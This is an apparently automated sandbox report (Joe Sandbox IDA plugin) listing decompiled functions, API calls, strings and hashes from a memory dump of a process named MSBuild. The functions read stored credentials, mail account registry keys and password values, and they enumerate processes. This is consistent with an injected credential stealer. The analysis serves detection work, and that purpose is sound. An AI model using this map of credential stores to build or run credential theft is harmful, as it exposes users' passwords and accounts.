strrchr.MSVCRT ref: 0040C417
_mbscat.MSVCRT ref: 0040C431
_mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
_mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
GetWindowPlacement.USER32(?,?), ref: 0040C50C

Strings

.cfg, xrefs: 0040C42B
WinPos, xrefs: 0040C520
General, xrefs: 0040C470
AddExportHeaderLine, xrefs: 0040C4C1
MarkOddEvenRows, xrefs: 0040C4DA
SaveFilterIndex, xrefs: 0040C4A8
ShowGridLines, xrefs: 0040C48F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
API String ID: 1012775001-1343505058
Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65

Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040CDE0
_strcmpi.MSVCRT ref: 0040CDF5

Strings

/skeepass, xrefs: 0040CE59
/sxml, xrefs: 0040CE05
/shtml, xrefs: 0040CDDB
/sverhtml, xrefs: 0040CDF0
/stab, xrefs: 0040CE1A
/scomma, xrefs: 0040CE2F
/stabular, xrefs: 0040CE44

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 1439213657-1959339147
Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC

Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00444612

Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F

strlen.MSVCRT ref: 0044462E
memset.MSVCRT ref: 00444668
memset.MSVCRT ref: 0044467C
memset.MSVCRT ref: 00444690
memset.MSVCRT ref: 004446B6

Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296

Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319

memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED

Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272

Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA

memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
_mbscpy.MSVCRT(?,?), ref: 00444812
memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855

Strings

salu, xrefs: 00444649

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset$strlen$_mbscpy
String ID: salu
API String ID: 3691931180-4177317985
Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95

Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
FreeLibrary.KERNEL32(00000000), ref: 004100C4

Strings

GetModuleInformation, xrefs: 0041009E
GetModuleFileNameExA, xrefs: 0041007C
psapi.dll, xrefs: 00410042
EnumProcesses, xrefs: 0041008D
EnumProcessModules, xrefs: 0041006B
GetModuleBaseNameA, xrefs: 0041005A

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E

Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA

Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754

strlen.MSVCRT ref: 00443AD2
??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
memset.MSVCRT ref: 00443B2E
memset.MSVCRT ref: 00443B4B
_mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
RegCloseKey.ADVAPI32(?), ref: 00443BBD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
LocalFree.KERNEL32(?), ref: 00443C23
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C

Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384

Strings

Software\Microsoft\Windows Mail, xrefs: 00443B61
Salt, xrefs: 00443BA7
Software\Microsoft\Windows Live Mail, xrefs: 00443B6D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
API String ID: 665470638-2687544566
Opcode ID: 4244c0b183e441fae60c970d5fdb6643f88dd39dd9d0669a8d19a267a153d5db
Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
Opcode Fuzzy Hash: 4244c0b183e441fae60c970d5fdb6643f88dd39dd9d0669a8d19a267a153d5db
Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68

Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

memset.MSVCRT ref: 00403ECE
memset.MSVCRT ref: 00403EE2
memset.MSVCRT ref: 00403EF6
sprintf.MSVCRT ref: 00403F17
_mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
sprintf.MSVCRT ref: 00403F6A
sprintf.MSVCRT ref: 00403F9B

Strings

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
<table dir="rtl"><tr><td>, xrefs: 00403F2D
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memsetsprintf$FileWrite_mbscpystrlen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 113626815-1670831295
Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69

Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0040957B
LoadMenuA.USER32(?,?), ref: 00409589

Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A

DestroyMenu.USER32(00000000), ref: 004095A7
sprintf.MSVCRT ref: 004095EB
CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
memset.MSVCRT ref: 0040961C
GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
DestroyWindow.USER32(00000000), ref: 0040965C

Strings

dialog_%d, xrefs: 004095E1
caption, xrefs: 00409642
menu_%d, xrefs: 00409571

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
String ID: caption$dialog_%d$menu_%d
API String ID: 3259144588-3822380221
Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E

Function 0040FFB0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040FFD8
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C

Strings

Module32First, xrefs: 0040FFE3
CreateToolhelp32Snapshot, xrefs: 0040FFD2
Process32Next, xrefs: 00410016
Process32First, xrefs: 00410005
Module32Next, xrefs: 0040FFF4
kernel32.dll, xrefs: 0040FFBA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D

Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D

LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631

Strings

CredDeleteA, xrefs: 0040460F
CredEnumerateW, xrefs: 00404627
CredFree, xrefs: 00404603
CredEnumerateA, xrefs: 0040461B
CredReadA, xrefs: 004045FB
advapi32.dll, xrefs: 004045E3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
API String ID: 2449869053-4258758744
Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88

Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
memset.MSVCRT ref: 0040F84A
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
LocalFree.KERNEL32(?), ref: 0040F92C
RegCloseKey.ADVAPI32(?), ref: 0040F937
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
RegCloseKey.ADVAPI32(?), ref: 0040F95F

Strings

ps:password, xrefs: 0040F891
Creds, xrefs: 0040F824

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
String ID: Creds$ps:password
API String ID: 551151806-1872227768
Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64

Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0040426A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
_mbscpy.MSVCRT(?,?), ref: 004042D5
_mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
strchr.MSVCRT ref: 004042F6
strlen.MSVCRT ref: 0040430A
sprintf.MSVCRT ref: 0040432B
strchr.MSVCRT ref: 0040433C

Strings

www.google.com, xrefs: 00404264
%s@gmail.com, xrefs: 00404325

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
String ID: %s@gmail.com$www.google.com
API String ID: 3866421160-4070641962
Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58

Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(0045A448,?), ref: 00409749
_mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759

Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C

EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
_mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
memset.MSVCRT ref: 004097BD
LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1

Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B

Strings

TranslatorName, xrefs: 00409764
strings, xrefs: 0040979B
general, xrefs: 0040974E
TranslatorURL, xrefs: 0040976F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
String ID: TranslatorName$TranslatorURL$general$strings
API String ID: 1035899707-3647959541
Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD

Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0

Strings

Startup, xrefs: 00410D68
Start Menu, xrefs: 00410D61
Common Startup, xrefs: 00410DA3
Common Start Menu, xrefs: 00410D7D
Desktop, xrefs: 00410D5A
Favorites, xrefs: 00410D6F
Common Desktop, xrefs: 00410D9C
AppData, xrefs: 00410D95
Programs, xrefs: 00410D76
Common Programs, xrefs: 00410DAA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 714388716-318151290
Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F

Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32(?,00000001), ref: 0040CAA9
SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
SelectObject.GDI32(?,?), ref: 0040CACC
DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
SelectObject.GDI32(00000014,?), ref: 0040CB0D

Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE

LoadCursorA.USER32(00000067), ref: 0040CB2E
SetCursor.USER32(00000000), ref: 0040CB35
PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
SetFocus.USER32(?), ref: 0040CB92
SetFocus.USER32(?), ref: 0040CC0B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
String ID:
API String ID: 1416211542-0
Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D

Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

_strnicmp.MSVCRT ref: 0040E3B0
_strnicmp.MSVCRT ref: 0040E3D5
memset.MSVCRT ref: 0040E41E
memset.MSVCRT ref: 0040E434
sprintf.MSVCRT ref: 0040E453
sprintf.MSVCRT ref: 0040E472
_strcmpi.MSVCRT ref: 0040E491
_strcmpi.MSVCRT ref: 0040E4B3

Part of subcall function 004012EE: strlen.MSVCRT ref: 004012FB

Strings

mailbox://%s@%s, xrefs: 0040E44D
mailbox://, xrefs: 0040E3AA
imap://, xrefs: 0040E3CF
imap://%s@%s, xrefs: 0040E46C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi_strnicmpmemsetsprintf$strlen
String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
API String ID: 2360744853-2229823034
Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58

Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

memset.MSVCRT ref: 00402C9D

Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85

RegCloseKey.ADVAPI32(?), ref: 00402D9F

Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57

memset.MSVCRT ref: 00402CF7
sprintf.MSVCRT ref: 00402D10
sprintf.MSVCRT ref: 00402D4E

Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55

Strings

Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00402D3A
%s\%s, xrefs: 00402CBF, 00402D0E, 00402D4C
Username, xrefs: 00402CD0
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00402CFC
Identities, xrefs: 00402C6B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Closememset$sprintf$EnumOpen
String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
API String ID: 1831126014-3814494228
Opcode ID: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
Opcode Fuzzy Hash: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 004100E4
_mbscpy.MSVCRT(?,-00000001), ref: 004100F2

Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874

_mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
_mbscat.MSVCRT ref: 0041014D
memset.MSVCRT ref: 00410129

Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180

memset.MSVCRT ref: 00410171
memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
_mbscat.MSVCRT ref: 00410197

Strings

